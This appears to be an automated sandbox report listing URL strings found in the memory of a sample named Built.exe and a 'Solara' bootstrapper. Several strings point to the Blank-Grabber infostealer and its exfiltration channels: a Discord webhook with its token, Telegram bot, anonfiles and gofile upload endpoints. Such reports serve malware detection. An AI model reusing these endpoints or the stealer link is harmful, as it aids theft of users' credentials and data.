Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Built.exe, 00000003.00000003.1723015073.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1723076390.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1726133124.000001D5E524B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.cl.cam.ac.uk/~mgk25/iso-time.html
Source: Built.exe, 00000001.00000003.1694498399.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692460719.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691489699.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691403235.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692191487.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691001197.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690798025.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690704289.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1690885762.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692549527.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1692750253.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694183829.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691323081.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1694290599.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691113507.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000001.00000003.1691226832.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: Built.exe, 00000003.00000003.1728491309.000001D5E51DB000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1728276236.000001D5E5352000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1728010134.000001D5E5351000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: Built.exe, 00000003.00000003.1723015073.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1723155170.000001D5E4FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/time-zones/repository/tz-link.html
Source: Built.exe, 00000003.00000003.1837956846.000001D5E4FC7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoftCCD7E~1JSOy.
Source: Built.exe, 00000003.00000003.1723015073.000001D5E525A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1723076390.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1726133124.000001D5E524B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm
Source: Built.exe, 00000003.00000002.2054526869.000001D5E58F4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://MD8.mozilla.org/1/m
Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Built.exe, 00000003.00000002.2054526869.000001D5E5914000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://account.bellmedia.c
Source: powershell.exe, 00000011.00000002.1868518526.0000026901681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1799627258.000001F300001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/upload-
Source: Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.anonfiles.com/uploadr
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.github.com/_private/browser/errors
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.github.com/_private/browser/stats
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServer
Source: Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.gofile.io/getServerr
Source: Built.exe, 00000003.00000003.1929122586.000001D5E5D33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.stripe.com/v
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://avatars.githubusercontent.com
Source: Built.exe, 00000003.00000003.1726595751.000001D5E528A000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1726708357.000001D5E4E52000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1727130302.000001D5E4E58000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2043351840.000001D5E4E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bugs.python.org/issue42195.
Source: Built.exe, 00000003.00000002.2054526869.000001D5E5820000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://collector.github.com/github/collect
Source: powershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000015.00000002.1920822285.000001F310077000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: Built.exe, 00000001.00000003.1693285558.0000021AFD7DF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0.
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/v9/users/
Source: Built.exe, 00000003.00000003.1929122586.000001D5E5D33000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v
Source: Built.exe, 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
Source: Built.exe, 00000003.00000002.2053454427.000001D5E5620000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/webhooks/1255594789861195827/8s6rt3E8edVCsvsaavUpcA9mRxd3KM7eS7ju4bkPhLPk
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.github.com
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.github.com/get-started/accessibility/keyboard-shortcuts
Source: Built.exe, 00000003.00000003.1711153853.000001D5E4CFD000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1711065402.000001D5E4CF5000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1710267778.000001D5E4E89000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1710532955.000001D5E4CBA000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64
Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Built.exe, 00000003.00000002.2053069084.000001D5E5520000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://foss.heptapod.net/pypy/pypy/-/issues/3539
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github-cloud.s3.amazonaws.com
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.blog
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com(
Source: Built.exe, 00000003.00000002.2050287577.000001D5E543E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabber
Source: Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabberi
Source: Built.exe, 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/Blank-Grabberr
Source: Built.exe, 00000003.00000003.1721899935.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722107518.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722297762.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1721185120.000001D5E552D000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1722439728.000001D5E4F9C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Blank-c/BlankOBF
Source: powershell.exe, 00000015.00000002.1799627258.000001F300228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: Built.exe, 00000003.00000003.1703569315.000001D5E2E66000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2042088940.000001D5E4C20000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1707526751.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1709356922.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703484396.000001D5E4C21000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703747283.000001D5E2E6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/collections
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/customer-stories
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/enterprise
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/enterprise/advanced-security
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/enterprise/startups
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/actions
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/code-review
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/codespaces
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/copilot
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/discussions
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/issues
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/packages
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/features/security
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/fluidicon.png
Source: Built.exe, 00000003.00000003.1703569315.000001D5E2E66000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041700632.000001D5E4868000.00000004.00001000.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703484396.000001D5E4C21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
Source: Built.exe, 00000003.00000003.1703747283.000001D5E2E6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
Source: Built.exe, 00000003.00000003.1703569315.000001D5E2E66000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2042088940.000001D5E4C20000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1707526751.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1709356922.000001D5E2E59000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000002.2041474961.000001D5E2DF1000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703484396.000001D5E4C21000.00000004.00000020.00020000.00000000.sdmp, Built.exe, 00000003.00000003.1703747283.000001D5E2E6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.00000000029F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zip"
Source: Vjy8d2EoqK.exe, 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, S l r .exe, 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, S l r .exe, 00000004.00000003.1715340990.000000000055D000.00000004.00000020.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000000.1711320937.00000000004F2000.00000002.00000001.01000000.00000010.sdmp	String found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipK
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/quivings/Solara/raw/main/Files/Solara.Dir.zipd
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/readme
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/solutions/ci-cd
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/solutions/devops
Source: SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/solutions/devsecops
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/solutions/industries/financial-services
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/solutions/industries/healthcare
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/solutions/industries/manufacturing
Source: SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002BBB000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A5C000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1761345082.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, SolaraBootstrapper.exe, 00000007.00000002.1767036053.0000000003A72000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/team
